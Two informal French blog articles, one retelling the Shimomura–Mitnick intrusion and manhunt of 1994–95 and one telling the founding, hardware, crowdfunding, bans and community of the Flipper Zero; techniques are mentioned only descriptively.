Bon, je sais que quand on parle de l’affaire Kevin Mitnick, y’a toujours deux camps qui s’écharpent. Mais, l’histoire de Tsutomu Shimomura, c’est du grand cinéma. Noël 1994, le physicien rentre tranquillement chez lui à Solana Beach et là, il découvre que quelqu’un s’est introduit dans son système informatique. Et pas via une effraction physique classique, non, mais par les “tubes cathodiques” (oui, je vous explique le délire après…lol). Et le type a même laissé un message sur son répondeur pour le narguer. Une erreur fatale quand on s’attaque à un chasseur de hackers.

Tsutomu Shimomura, c’est pas n’importe qui dans le game. Il est le fils d’Osamu Shimomura, LE Shimomura qui a décroché le Prix Nobel de chimie en 2008 pour ses travaux sur la protéine fluorescente verte des méduses. C’est ce truc vert fluo qui permet aujourd’hui aux chercheurs de visualiser les cellules vivantes en temps réel. Bref, le fiston a grandi dans un environnement où l’excellence scientifique, c’était la base. Sauf que contrairement à papa qui étudiait les méduses bioluminescentes (il en a pêché 850 000 quand même !), lui décide de chasser les prédateurs numériques.

Et c’est grâce à ses techniques de traque high-tech avec triangulation cellulaire et analyse de fréquences que Kevin Mitnick, le hacker le plus recherché d’Amérique à l’époque, se retrouve derrière les barreaux le 15 février 1995 à 1h30 du matin précisément.

Mais attention, comme toujours l’histoire est bien plus complexe qu’elle n’y paraît.

Né en 1964 à Kyoto, Tsutomu montre déjà des signes de rébellion dès le lycée. Le gamin se fait carrément expulser de Princeton High School pour “attitude anticonformiste”. Il faisait partie d’un groupe d’étudiants qui n’acceptaient pas l’autorité établie et pourtant, gagnait des concours locaux de maths et sciences. Ça vous rappelle quelque chose ? Génie + caractère de cochon = futur expert en sécurité informatique.

Ensuite, direction Caltech où il va étudier sous la direction de Richard Feynman. Oui, LE Feynman, Prix Nobel de physique et légende vivante. Franchement, avoir ce type comme prof, ça doit marquer à vie. Feynman était connu pour ses méthodes d’enseignement peu orthodoxes et sa capacité à simplifier les concepts les plus complexes. Parfait donc pour former un futur chasseur de hackers qui devra expliquer des trucs techniques aux agents du FBI.

Richard Feynman

Après Caltech, Shimomura file à Los Alamos National Laboratory. Là, il travaille avec Brosl Hasslacher sur les automates de gaz sur réseau (lattice gas automata pour les intimes). En gros, ils simulent l’écoulement des fluides avec des méthodes de calcul parallèle massif. Pourquoi je vous parle de ça ? Parce que cette expertise va directement lui servir plus tard. Quand vous maîtrisez les systèmes parallèles et les algorithmes complexes, traquer des hackers devient presque un jeu d’enfant.

En 1989, Shimomura rejoint le San Diego Supercomputer Center comme Senior Fellow. Officiellement, il fait de la recherche en physique computationnelle. Officieusement, il commence à faire du consulting pour des agences gouvernementales sur les questions de sécurité. En 1992, il témoigne même devant le Congrès américain sur les failles de sécurité des téléphones cellulaires. Il avait déjà identifié les vulnérabilités que les hackers allaient exploiter. Le type était en avance sur son temps.

Maintenant, accrochez-vous parce que l’histoire devient vraiment “juteuse”. Le 25 décembre 1994, pendant que tout le monde déballe ses cadeaux de Noël, Kevin Mitnick décide de s’attaquer au système personnel de Shimomura. Pourquoi lui ? Probablement parce que Shimomura avait des fichiers ultra-intéressants sur la sécurité des réseaux et des téléphones cellulaires. C’était du caviar pour un hacker.

Tsutomu Shimomura et Julia Menapace

La technique utilisée ? De l’art ! Mitnick utilise ce qu’on appelle le “source address spoofing” combiné avec la “TCP sequence prediction”. Pour faire simple, il fait croire au système de Shimomura qu’il est un ordinateur de confiance en prédisant les numéros de séquence TCP. C’est comme si quelqu’un se déguisait en facteur pour entrer chez vous, mais en plus compliqué.

Bien sûr, Mitnick ne s’est pas littéralement introduit via un tube cathodique d’écran CRT (ça n’a pas de sens physiquement 😅), mais via une attaque réseau ciblée, exploitant des failles dans le protocole X11 et dans des systèmes SunOS non patchés. L’expression “par les tubes cathodiques” que j’ai employé au début de ce récit vient de la façon dont certains journalistes de l’époque avaient vulgarisé le truc car Mitnick a utilisé une session graphique X11 pour ouvrir une fenêtre à distance sur le poste de Shimomura. Et comme c’était une interface graphique, les médias nous ont pondu l’image du hacker qui passe par l’écran. Et comme à l’époque, un écran = tube cathodique, hop, ça fait pas des chocapics mais une “intrusion par le tube cathodique”.

Mais Mitnick fait une erreur psychologique majeure. Non content d’avoir pénétré le système et volé des centaines de fichiers, il laisse des messages moqueurs sur le répondeur de Shimomura. Des trucs du genre “Votre sécurité, elle est où ?” avec une voix déformée. Breeeef, quand on s’attaque à un expert en sécurité fils d’un Prix Nobel, on évite de le narguer car c’est comme tirer la queue d’un tigre endormi.

Shimomura découvre alors l’intrusion en rentrant de San Francisco. Des centaines de fichiers copiés, des programmes volés, son système compromis. Mais au lieu de simplement changer ses mots de passe et passer à autre chose comme vous et moi, il décide alors de traquer l’intrus. Et là, ça devient technique.

Première étape : Analyser les traces laissées par l’attaque. Shimomura identifie que Mitnick utilise des connexions par modem cellulaire pour masquer sa position. Malin, mais pas suffisant contre un physicien qui a étudié les systèmes de communication et qui a témoigné devant le Congrès sur le sujet.

Deuxième étape : Coopération avec les opérateurs téléphoniques. Shimomura contacte Sprint et d’autres compagnies et avec leur aide, il arrive à tracer les connexions jusqu’à la source. Mais attention, on est en 1995, et les techniques de géolocalisation étaient primitives comparées à aujourd’hui. Y’avait pas de GPS dans tous les téléphones, hein !

Troisième étape : Triangulation radio. Shimomura utilise des techniques de direction finding pour localiser précisément l’émetteur. En gros, avec plusieurs antennes, on peut déterminer la direction d’où vient un signal. Croiser plusieurs directions permet alors de déterminer la position exacte. C’est de la physique pure appliquée à la chasse au hacker.

Shimomura estime qu’il lui a fallu seulement quatre jours de travail intensif pour localiser Mitnick. Le 12 février 1995, il savait déjà où se trouvait Mitnick à un mile près. Le 15 février, il débarque à Raleigh en Caroline du Nord, avec une équipe de techniciens du FBI. Ils utilisent des équipements de surveillance radio pour isoler l’immeuble exact : le Players Court, près de l’aéroport de Raleigh-Durham.

Et pourquoi Raleigh ? Et bien Mitnick expliquera plus tard qu’il adorait le jeu Monopoly et les propriétés vertes, et la Caroline du Nord, c’est les propriétés vertes sur le plateau américain. Le type avait aussi 44 demandes d’emploi dans son appart et un bouquin “The 100 Best Companies to Work for in America”. Il voulait se ranger, apparemment.

À 1h30 du matin, le FBI frappe à la porte. Mitnick se fait arrêter avec un arsenal numérique impressionnant : des téléphones clonés et de multiples fausses identités. C’est game over. Il sera condamné à presque 6 ans de prison, dont une grande partie en isolement parce que le juge avait peur qu’il pirate le téléphone de la prison. Hé oui !

Après l’arrestation, Shimomura décide de raconter son histoire. Avec John Markoff, journaliste au New York Times, il publie “Takedown: The Pursuit and Capture of Kevin Mitnick” en 1996. Le livre devient un best-seller et sera adapté au cinéma sous le titre “Operation Takedown” en 2000 avec Skeet Ulrich dans le rôle de Mitnick.

Sauf que voilà, tout le monde n’est pas d’accord avec cette version des faits. Jonathan Littman publie “The Fugitive Game” la même année et accuse carrément Shimomura et Markoff d’avoir fabriqué des éléments pour se faire mousser. Plus tard, Mitnick lui-même riposte avec “Ghost in the Wires” en 2011, où il surnomme Shimomura “Shimmy” avec un ton franchement méprisant.

Kevin Mitnick lors de son arrestation

La vérité ? Elle se trouve probablement quelque part entre les trois versions car Shimomura a certainement contribué à la capture, mais il a peut-être aussi dramatisé son rôle. Mitnick n’était probablement pas le génie du mal qu’il a décrit, mais il était loin d’être innocent avec ses 25 chefs d’accusation de crimes informatiques.

Après sa célébrité soudaine, Shimomura aurait pu capitaliser sur sa notoriété et devenir consultant en cybersécurité comme tout le monde. Mais non, le type prend une direction complètement différente. Il rejoint Sun Microsystems à la fin des années 90, puis fonde sa propre boîte : Neofocal Systems.

Neofocal, c’est pas de la cybersécurité. C’est de la technologie LED intelligente ! Shimomura développe des puces pour contrôler des réseaux de LED individuellement adressables. En gros, vous pouvez contrôler chaque LED séparément avec un seul câble pour l’alimentation et des données. En 2015, Neofocal lève 9 millions de dollars. Pas mal pour un pivot aussi radical.

L’affaire Shimomura-Mitnick soulève des questions qui résonnent encore aujourd’hui. Jusqu’où peut aller un civil dans une enquête criminelle ? Les méthodes de Shimomura, acceptables en 1995, seraient probablement problématiques aujourd’hui. Traquer quelqu’un avec des équipements de surveillance radio sans mandat, c’est limite. Mais d’un autre côté, les méthodes traditionnelles d’investigation étaient totalement inadaptées face aux nouveaux crimes numériques.

Alors 30 ans après, qu’est-ce qui reste de cette histoire ? Et bien Shimomura a prouvé que la science théorique peut être une arme redoutable en cybersécurité. Il a démontré l’importance de la coopération entre secteur privé et forces de l’ordre (aujourd’hui c’est la norme) et ses préoccupations de 1992 sur la sécurité des téléphones cellulaires étaient visionnaires !

Kevin Mitnick est décédé le 16 juillet 2023 d’un cancer du pancréas, à 59 ans, mettant fin à l’une des rivalités les plus emblématiques de l’histoire de la cybersécurité. Il était devenu Chief Hacking Officer chez KnowBe4 et consultant en sécurité respecté. Shimomura, lui, continue aujourd’hui d’innover dans le secteur des semiconducteurs. Deux destins différents pour deux figures légendaires du monde du hacking.

À vous de voir maintenant si les méthodes de Shimomura étaient justifiées ou pas mais une chose est sûre : ne narguez jamais un physicien qui connaît les protocoles TCP par cœur !

Sources : Department of Justice - Arrest of Kevin Mitnick (1995), Nobel Prize - Osamu Shimomura Facts, Great Rivalries in Cybersecurity: Tsutomu Shimomura vs. Kevin Mitnick, WRAL - Kevin Mitnick reflects on Raleigh arrest, Wikipedia - Kevin Mitnick, CNN - Kevin Mitnick obituary (2023)

Bon, vous connaissez sans doute le Flipper Zero, ce petit boîtier orange qui ressemble à un Tamagotchi sous stéroïdes et qui fait flipper Amazon, le Canada et à peu près tous les responsables sécurité de la planète. Mais connaissez-vous vraiment l’histoire dingue de Pavel Zhovner, le mec qui a créé ce truc ?

Allez, c’est parti, je vais tout vous raconter !!

L’histoire commence à Odessa, en Ukraine, où le jeune Pavel Zhovner grandit avec une obsession maladive : Comprendre comment fonctionnent les trucs. Pas juste les comprendre superficiellement façon notice IKEA, mais aller au fond des choses, décortiquer, analyser, reconstruire. C’est le genre de gamin qui démonte le grille-pain familial “pour voir” et qui finit avec 12 pièces en trop au remontage. Diplômé de l’Université Polytechnique Nationale d’Odessa, Pavel se décrit lui-même avec une phrase qui résume tout : “Depuis mon enfance, j’aime explorer les choses autour de la nature, de la technologie et des humains”. Oui, des humains aussi.

Mais attention, Pavel refuse catégoriquement le terme “hacker”. Il préfère “nerd”, qu’il trouve plus honnête. Du coup, cette distinction n’est pas anodine car elle révèle une philosophie qui imprégnera plus tard tout le projet Flipper Zero à savoir la transparence, l’honnêteté, et le refus des étiquettes faciles. Parce que bon, entre nous, “hacker” ça fait tout de suite film hollywoodien avec des mecs en capuche qui tapent frénétiquement sur un clavier dans le noir. Alors que “Nerd”, c’est plus… authentique.

Avant de devenir le CEO de Flipper Devices et de terroriser les gouvernements du monde entier avec son dauphin orange, Pavel n’était pas un inconnu dans le monde de la tech underground. En 2017, face aux blocages internet imposés en Ukraine (merci Poutine), il crée Zaborona.help, un service VPN gratuit pour contourner la censure. Le projet, entièrement open source sur GitHub, utilise OpenVPN avec des serveurs multiples et propose même un script d’installation automatique pour Windows. C’était déjà la marque de fabrique de Pavel : Créer des outils accessibles pour donner du pouvoir aux utilisateurs face aux restrictions imposées par les couillons au pouvoir.

Mais le vrai game changer dans la vie de Pavel, c’est sa rencontre avec le Moscow Neuron Hackspace. En 2011, après avoir assisté au Chaos Communication Congress à Berlin (le Burning Man des hackers, mais avec plus de LED et moins de hippies), Alexander Chemeris décide d’importer le concept de hackerspace en Russie. Il faudra deux ans pour construire une communauté solide, mais Moscow Neuron Hackspace finit par voir le jour, installé au Хохловский пер 7/9 стр. 2, au cœur de Moscou. L’adresse est imprononçable, mais l’endroit était mythique.

C’est là que Pavel Zhovner prend les rênes et devient responsable du hackerspace. Entre 2013 et 2015, des universitaires sont même venus observer ces nerds dans leur habitat naturel, comme des gorilles des montagnes, dans le cadre d’une étude ethnographique. Neuron devient alors un espace alternatif pour l’industrie IT créative et l’entrepreneuriat startup, loin des initiatives étatiques pourries comme Skolkovo (le Silicon Valley russe, mais en nul). On y organise des conférences TEDx en anglais pour faire chier les autorités, des ateliers sur les réseaux sociaux, on apprend à construire des robots qui servent à rien mais qui sont cool, on expérimente avec l’impression 3D avant que tout le monde sache ce que c’est.

Neuron n’est pas qu’un simple makerspace où des barbus soudent des trucs random. C’est un lieu de résistance culturelle, un espace qui promeut “la confiance, le partage de connaissances et l’échange de compétences” selon l’étude académique (qui utilisait beaucoup de mots compliqués pour dire “des mecs cool qui s’entraident”). Pavel y développe sa vision où la technologie doit être accessible, compréhensible, hackable. C’est dans cet environnement bouillonnant de créativité et de café instantané qu’il rencontre alors Alex Kulagin.

Alexander Kulagin, diplômé du prestigieux MEPhI (Institut de Physique et d’Ingénierie de Moscou, l’endroit où l’URSS formait ses génies du nucléaire), apporte une expertise hardware cruciale. Entrepreneur IT avec plus de 5 ans d’expérience dans le développement hardware et la production de masse, il devient le COO (Chief Operations Officer) de ce qui deviendra Flipper Devices. Là où Pavel est le visionnaire philosophe qui part dans des délires métaphysiques sur la nature du hacking, Alex, lui, est le pragmatique qui sait transformer les idées en produits manufacturables sans faire exploser l’usine.

Alex et Pavel (Image IA)

Dans une interview, Kulagin explique leur vision commune : “Nous avons conçu l’appareil comme un outil de recherche et d’éducation pour tester la vulnérabilité des technologies quotidiennes qui nous entourent, souvent celles auxquelles vous n’auriez jamais pensé qu’elles pouvaient être dangereuses.” Genre votre porte de garage qui s’ouvre avec un signal radio basique qu’un gamin de 12 ans pourrait copier. Ou votre badge de bureau qui utilise une techno des années 90.

Le choix du dauphin comme mascotte n’est pas anodin non plus. “Nous avons décidé que le personnage principal serait un dauphin dès le début”, explique Kulagin. “Notre dauphin est excentrique, queer, enthousiaste mais simple et gentil en même temps. Nous voulions créer un personnage avec qui vous auriez envie d’être ami.” Et puis soyons honnêtes, un dauphin c’est moins menaçant qu’un requin ou qu’un logo de tête de mort…

2019, Pavel se balade avec l’arsenal classique du pentester dans son sac à dos… Il est bien équipé… adaptateurs WiFi, lecteurs NFC, SDR, Proxmark3, HydraNFC, Raspberry Pi Zero. Le truc, explique-t-il c’est que “Tous ces appareils ne sont pas faciles à utiliser en déplacement surtout quand vous avez une tasse de café dans une main ou que vous faites du vélo”. Et c’est vrai que sortir un Proxmark3 dans le métro pour tester une carte de transport, ça fait tout de suite très louche.

Il expérimente alors avec un Raspberry Pi Zero W pour automatiser les interactions AirDrop dans le métro de Moscou (pour envoyer des memes aux gens, évidemment), mais le résultat est catastrophique : “Les pointes de soudure déchiraient le tissu de mon pantalon”. Ses tentatives de boîtiers imprimés en 3D sont tout aussi décevantes… Bref, ça ressemblait plus à un projet d’école primaire qu’à un outil de hacking sérieux.

Le déclic arrive quand un Tamagotchi Friends original de Bandai lui tombe entre les mains. Pavel découvre que ces appareils sont encore produits et vendus en 2019. Mais qui achète encore des Tamagotchi en 2019 ??? Et c’est là que l’idée germe dans sa tête. Et si on combinait le côté ludique et attachant du Tamagotchi avec les capacités d’un outil de pentest sérieux ? Un truc qu’on peut sortir dans un café sans qu’on appelle les flics.

Après avoir utilisé le pwngotchi (un projet de Tamagotchi AI pour le hacking WiFi), Pavel réalise qu’il en fait qu’il veut, je cite “Un appareil qui apportera simultanément de la joie au format Tamagotchi, serait esthétiquement similaire aux consoles de jeux rétro et serait assez méchant pour hacker tout autour”. En gros, une Game Boy qui peut ouvrir des portes.

Pavel tweete alors son idée et ses amis designers produit, ceux qui “font des trucs électroniques sérieux” (comprendre : pas des bricolages avec de la colle chaude), lui suggèrent de créer un appareil fini, au lieu de se lancer dans un bricolage DIY fait maison avec “une vraie production en usine et des pièces de qualité”. Bref, arrête de jouer avec ton fer à souder dans ton garage et fais un vrai produit.

C’est donc le début de l’aventure Flipper Zero et Pavel et Alex se lancent dans le développement des premiers prototypes. Le nom “Flipper” vient du dauphin cybernétique du film Johnny Mnemonic avec Keanu Reeves et le concept c’est un dauphin virtuel qui vit dans l’appareil et évolue au fur et à mesure que son propriétaire interagit avec lui, se fâchant quand il n’est pas utilisé fréquemment. C’est un Tamagotchi, mais pour hackers.

Mais détrompez-vous, le Flipper Zero n’est pas qu’un gadget mignon qui fait bip-bip. C’est une prouesse technique basée sur un microcontrôleur STM32WB55 à double cœur ARM. Un Cortex-M4 à 64 MHz pour le firmware principal (le cerveau) et un Cortex-M0 à 32 MHz pour le Bluetooth Low Energy (le moulin à paroles). Avec 256 KB de RAM et 1 MB de stockage Flash, c’est suffisant pour faire tourner un système complet. C’est évidemment moins puissant que votre smartphone, mais c’est exactement ce qu’il faut.

L’écran est un LCD monochrome rétro avec rétroéclairage orange de 128×64 pixels. “Au lieu des écrans modernes TFT, IPS ou OLED, nous avons délibérément choisi un cool LCD old-school”, explique l’équipe et comme sur les vieux téléphones monochromes Nokia 3310 et les Tamagotchi, l’écran est toujours allumé. Rassurez-vous, la batterie ne se vide en 3 heures comme sur votre iPhone.

Les capacités radio sont aussi impressionnantes pour un truc de la taille d’un paquet de clopes. Il est équipé d’une antenne 125 kHz en bas pour lire les cartes de proximité basse fréquence (vos vieux badges de bureau), d’un module NFC intégré (13.56 MHz) pour les cartes haute fréquence (cartes de transport, badges modernes), d’une puce CC1101 avec antenne multi-bande pour une portée jusqu’à 50 mètres (portails, alarmes de voiture), d’infrarouge pour contrôler les appareils domestiques (bye bye la télécommande perdue), et de GPIO pour se connecter à des modules externes (pour les vrais nerds).

Puis le 30 juillet 2020, la campagne Kickstarter est lancée avec un seul objectif : Récolter 60 000 dollars. Et le résultat est au delà de toutes leurs espérance puisque c’est exactement 4 882 784 dollars qui seront récoltés auprès de 37 987 contributeurs en seulement 30 jours. C’est 8138% de l’objectif initial. Du délire total.

Quand Pavel et Alex regardent les compteurs, ils se regardent, mi-excités, mi-terrifiés. “Comment on va produire tout ça ?” La réponse : avec beaucoup de café et pas mal de crises de panique.

La communauté est plus qu’excitée, elle est en ébullition totale. Et sur les forums, certains s’inquiètent déjà : “Devoir soudainement produire 8000% de votre objectif de production d’ici une date prédéfinie ressemble à un cauchemar.” Et ils avaient raison. Pavel et Alex se retrouvent alors face à un défi monumental : transformer un projet de hackerspace en une entreprise capable de produire près de 40 000 unités. Et tout cela en pleine pandémie de COVID-19. C’est là que le fun commence vraiment.

2021-2022, c’est l’enfer sur terre. La pénurie mondiale de puces frappe de plein fouet. Le fournisseur taïwanais Sitronix annonce une pénurie continue de puces 7565R. Toutes les commandes passées avant juin 2021 sont retardées. Pire, ils suspendent temporairement toutes les nouvelles commandes. C’est la merde totale.

L’équipe doit alors redesigner l’électronique et les PCB plusieurs fois pour remplacer les composants introuvables. Un cauchemar d’ingénierie surtout que les composants de puissance deviennent l’objet de spéculation sauvage, pire que les cartes Pokémon. Un convertisseur de tension passe de 0,50$ à 10,70$, un chargeur de batterie BQ25896RTWR devient littéralement impossible à acheter. Y’a aucun stock chez TI, DigiKey ou Mouser. C’est le Far West des composants électroniques.

L’équipe cherche alors des stocks dans des entrepôts alternatifs, chez de petits fournisseurs louches car ils refusent de payer 20 fois le prix normal par principe. La production est alors fragmentée : les boîtiers plastiques dans une usine en Chine, l’électronique dans une autre en Europe de l’Est. Et coordonner tout ça pendant les perturbations de la chaîne d’approvisionnement est un cauchemar logistique qui ferait pleurer un responsable Amazon.

Malgré tout, ils commencent à expédier en janvier 2022. Mi-2022, 90% des commandes Kickstarter sont expédiées. C’est un miracle dans ce contexte de “l’une des plus grandes crises du marché des composants électroniques des dernières décennies”. D’autres projets Kickstarter de la même époque n’ont toujours pas livré.

Mais dès le début, Pavel et Alex on adopté la tactique de la transparence et de l’ouverture maximales. Tout le code est sur GitHub sous licence GPLv3, y’a pas de bullshit propriétaire, pas de DRM, pas de fonctionnalités bloquées derrière un paywall. Et cette approche attire une communauté massive.

Des firmwares alternatifs apparaissent comme des champignons après la pluie : Unleashed (firmware débloqué avec support des rolling codes pour les vrais méchants), RogueMaster (le plus cutting-edge avec les dernières fonctionnalités communautaires), Momentum (continuation officielle d’Xtreme après son arrêt). La philosophie est claire… pas de paywall, pas d’apps propriétaires. “Chaque build a toujours été et sera toujours gratuit et open source”, proclament les développeurs d’Unleashed. Respect.

Comme je vous le disais, le dauphin du Flipper Zero n’est pas qu’une mascotte mignonne pour faire joli. L’équipe lui a donné une personnalité complexe : il “a des opinions politiques de gauche, écoute de la techno, et n’a pas d’identité de genre prononcée”. C’est une déclaration politique subtile mais claire sur les valeurs de l’entreprise. Un dauphin woke, en somme. Et cette personnalité se reflète dans les interactions car le dauphin s’énerve si vous ne l’utilisez pas, il évolue avec vos hacks, il a ses humeurs. C’est un compagnon numérique avec du caractère, et pas un simple assistant style Alexa qui répond “Désolé, je n’ai pas compris”.

Nous sommes maintenant en février 2022. La Russie envahit l’Ukraine. Pavel Zhovner est ukrainien et plus de 10% de l’équipe Flipper Devices est ukrainienne. La décision est alors immédiate et radicale : Plus aucune livraison vers la Russie, plus aucun recrutement en Russie, et une aide active pour faire sortir tous les employés russes du pays, avec un déménagement du siège à Londres. C’est efficace et c’est surtout un positionnement politique fort pour une entreprise tech qui aurait pu fermer sa gueule et continuer à vendre. Flipper Devices n’a plus rien à voir avec la Russie.

Puis en 2023, le Flipper Zero devient viral sur TikTok. Des vidéos montrent des utilisateurs qui ouvrent les ports de charge des Tesla (véridique), éteignent les menus électroniques des fast-foods (hilarant), changent les prix sur les pompes à essence (illégal), déverrouillent des voitures (parfois). Les vidéos accumulent des millions de vues. “Je ne m’attendais pas à ce que ça marche 😭”, titre l’une d’elles montrant l’ouverture d’une Tesla.

Mais la réalité est plus nuancée car la plupart des vidéos sont probablement mises en scène ou nécessitent une préparation significative. Les attaques démontrées ne fonctionnent que contre des systèmes primitifs ou mal protégés. Votre Tesla Model 3 est tranquille. Votre vieille Clio de 1998, peut-être un peu moins.

Puis en avril 2023, Amazon bannit le Flipper Zero, le classifiant comme “appareil de skimming de cartes”. L’ironie c’est que toutes les annonces sur Amazon étaient de toute façon des revendeurs non officiels vendant des contrefaçons chinoises, et pas Flipper Devices directement.

La réaction de Pavel et Alex est brillante car ils transforment alors cet obstacle en opportunité en créannt leur propre réseau de distribution. Le bannissement devient un argument marketing pour la liberté technologique et le “Amazon nous a bannis” devient un badge d’honneur. L’effet Streisand joue à plein tube et chaque nouvelle interdiction génère une couverture médiatique qui fait découvrir l’appareil à de nouveaux publics. Merci Amazon et les autres shop pour la pub gratuite !

En février 2024, le Canada annonce son intention de bannir le Flipper Zero, invoquant une vague de vols de voitures. Le problème, c’est qu’aucun vol de voiture connu à cette époque, n’implique un Flipper Zero. C’est comme bannir les cuillères parce que quelqu’un s’est noyé dans sa soupe. Car techniquement, le Flipper Zero ne peut pas démarrer une voiture moderne. Il peut capturer et rejouer certains signaux, mais c’est plus compliqué que ce qu’on croit. Bref, tout ceci n’est qu’un cas classique de panique morale technologique, comme quand les parents pensaient que Doom allait transformer leurs enfants en tueurs en série ou que le téléchargement illégal ou l’IA va tuer la création et les artistes.

La réponse cinglante de Flipper Devices ne se fait pas attendre : ils pointent l’absurdité de bannir un outil à 169$ qui ne peut pas faire ce dont on l’accuse, pendant que de vrais outils de vol de voitures (genre les programmeurs de clés à 5000$) circulent librement sur eBay…

Les résultats financiers de Flipper Devices sont stupéfiants pour une entreprise sans investisseurs, sans VCs vampires, sans bullshit corporate : 2021 - 5 millions de dollars de revenus. 2022 - 25 millions de dollars. 2023 - 80 millions de dollars avec 500 000 unités vendues en cette années là. Soit une croissance de 1500% en deux ans, entièrement organique. Comme je vous le disais, pas de VCs, pas de dilution. Juste le crowdfunding initial et des ventes. “C’est du capitalisme old school” : tu vends un produit, tu fais du profit, tu réinvestis. Point.

Le business model est d’une simplicité désarmante. Un prix fixe d’environ 169 dollars (pas de Flipper Zero Pro Max Ultra à 500$), des marges confortables grâce à la production en volume, une distribution directe. Pas de versions multiples pour embrouiller les clients, pas de segmentation marketing. Un produit unique qui fait tout. Apple pourrait apprendre.

2024, après trois ans de développement intensif, la version 1.0 du firmware sort enfin. Les nouveautés sont importantes : support JavaScript pour créer des apps sans connaître le C (pour les noobs), système NFC complètement réécrit avec système de plugins, autonomie d’un mois en veille (mange-toi ça Apple Watch), transfert Bluetooth 2x plus rapide avec Android, support des apps tierces dynamiques. C’est l’aboutissement de trois ans de travail acharné, mais aussi un nouveau départ. Car la v1.0 n’est pas une fin, c’est une nouvelle base pour la communauté.

Plus de 500 000 utilisateurs actifs, des centaines de repositories sur GitHub et tout autant d’apps communautaires, c’est ça, le vrai succès du Flipper Zero. La communauté développe des usages créatifs inattendus comme de l’émulation de cartes d’hôtel pour tester la sécurité (ou entrer dans sa chambre bourré), analyse de protocoles propriétaires d’équipements médicaux (ça fait peur !), reverse engineering de jouets connectés (pourquoi pas), ou encore audit de sécurité de systèmes domotiques (votre frigo connecté est vulnérable).

Le repository awesome-flipperzero liste des centaines de ressources, projets, et modifications. C’est un écosystème vivant qui dépasse largement ce que Pavel et Alex avaient imaginé. Comme Linux, mais en plus fun. Et l’équipe ne s’arrête pas au device de base puisque des modules additionnels sortent régulièrement comme un module WiFi pour l’analyse réseau (pour hacker le WiFi du voisin légalement), une carte SD pour stocker plus de données (tous vos dumps de cartes), des modules GPIO custom pour des projets spécifiques (pour les vrais malades). Une collaboration avec Raspberry Pi est même annoncée pour de nouveaux modules hardware. Le Flipper Zero devient une plateforme, pas juste un gadget.

Dans une interview, Alex Kulagin explique leur vision : “Pour moi, le Flipper Zero est un lanceur d’alerte pour les systèmes de sécurité du monde qui reposent sur de la technologie vieille, médiocre et facilement hackable. […] Ce que Flipper apporte, c’est la prise de conscience que, les gars, ce truc n’est pas sécurisé. Si quelque chose peut être hacké par un jouet à 100$, c’est peut-être trop vieux.”

Et cette philosophie guide tout. Le Flipper Zero n’est pas conçu pour les criminels - ils ont déjà des outils bien plus puissants et ne vont pas attendre qu’un dauphin orange arrive sur Kickstarter. Non, il est conçu pour les chercheurs en sécurité, les étudiants, les curieux afin de démocratiser la compréhension de la sécurité et surtout pour montrer que la sécurité par l’obscurité, c’est de la merde.

Bien sûr, tout n’est pas rose dans le monde merveilleux du dauphin orange. Des voix s’élèvent pour critiquer le Flipper Zero : “C’est un outil pour les script kiddies”, “Ça facilite le hacking malveillant”, “Les vidéos TikTok encouragent des comportements illégaux”…etc. Alors l’équipe répond patiemment…

Sur leur blog, ils expliquent que la majorité des fonctions peuvent être répliquées avec un smartphone et 10$ d’équipement sur AliExpress. Que les vrais criminels n’attendaient pas le Flipper Zero. Que l’éducation à la sécurité passe par la compréhension pratique. Voilà, c’est comme interdire les cours de serrurerie parce que ça pourrait former des cambrioleurs.

Le Flipper Zero a changé la perception du hacking hardware car ce n’est plus réservé à une élite technique avec des outils coûteux et un PhD en électronique. C’est accessible, ludique, mais sérieux. Des universités l’utilisent pour enseigner la sécurité (MIT, Stanford, même la Sorbonne s’y met). Des entreprises l’achètent pour auditer leurs systèmes (cheaper than a consultant). Des hobbyistes découvrent le monde du hardware hacking (et arrêtent de jouer à Candy Crush).

Le design “toy-like” brise les barrières psychologiques car les gens n’ont pas peur d’un Tamagotchi orange. Ils sont curieux, ils veulent comprendre. Et c’est exactement ce que voulaient Pavel et Alex à savoir rendre le hacking moins intimidant, plus accessible. Mission accomplie !!

Dans un tweet récent, Pavel avoue que “C’est encore difficile à croire. Je n’aurais jamais pu imaginer que le projet Flipper Zero atteindrait cette taille.” Et les défis sont encore nombreux du genre comment rester fidèle à l’esprit hacker en devenant mainstream ? Comment naviguer les régulations sans compromettre les fonctionnalités ? Comment scaler sans perdre l’âme du projet et finir comme Arduino (RIP) ?

Les projections pour 2024-2025 suggèrent un dépassement des 100 millions de revenus mais l’argent n’est pas le but. “Je crois en l’open source”, répète Pavel. “Le projet sera complètement ouvert.” Pas de vente à Microsoft ou Google, pas d’IPO foireuse, pas de transformation en corporation sans ame.

C’est de l’authenticité pure et ça paye car Pavel et Alex n’ont jamais caché leurs intentions, leurs valeurs, leurs difficultés. C’est cette transparence qui a créé une confiance inébranlable avec la communauté. Et c’est surtout une preuve que l’open source n’est pas incompatible avec le succès commercial. 80 millions de dollars de revenus avec tout le code sur GitHub, c’est la preuve que le modèle fonctionne, contrairement à ce que racontent certains.

Et les contraintes créent l’innovation… la pénurie de composants, les bannissements, les controverses… chaque obstacle a été transformé en opportunité. Surtout que la communauté est plus importante que le produit. Ce Flipper Zero ne serait rien sans ses 500 000 utilisateurs qui créent, partagent, innovent. Sans oublier que le design compte autant que les fonctionnalités… c’est un dauphin mignon qui a quand même rendu le pentest accessible au grand public.

Je ne l’aurais pas cru à l’époque. Et l’équipe tease régulièrement de nouveaux appareils en laissant entendre que d’autres produits sont en développement. Mais rassurez-vous, la vision reste la même. Démocratiser la compréhension de la technologie tout en donnant aux gens les outils pour comprendre et contrôler leur environnement numérique.

C’est une mission qui dépasse largement le Flipper Zero.

Pavel Zhovner et Alex Kulagin ont créé plus qu’un gadget. Ils ont créé un mouvement. Un mouvement qui dit que la technologie ne devrait pas être une boîte noire. Comme Phil Zimmermann avec PGP, ils ont mis un outil puissant entre les mains du peuple. Et comme Zimmermann, ils font face à l’incompréhension, aux interdictions, aux controverses. Mais ils tiennent bon.

Le succès du Flipper Zero a également inspiré des concurrents tels que HackRF (plus puissant mais moins accessible et coûte un bras), Proxmark (spécialisé RFID mais moins polyvalent), WiFi Pineapple (focus WiFi mais pas portable), mais aucun n’a la combinaison magique du Flipper, accessible, portable, polyvalent, et surtout, fun.

Le Flipper Zero est surtout devenu un symbole inattendu… un mélange de tech ukrainienne innovante (fuck yeah), de résistance à la censure technologique, d’innovation hors des grands centres tech américains, et de la possibilité de succès sans Silicon Valley et ses VCs toxiques. Des gouvernements s’inquiètent, des entreprises tremblent… Et tout ça à cause d’un Tamagotchi créé par deux nerds d’Europe de l’Est.

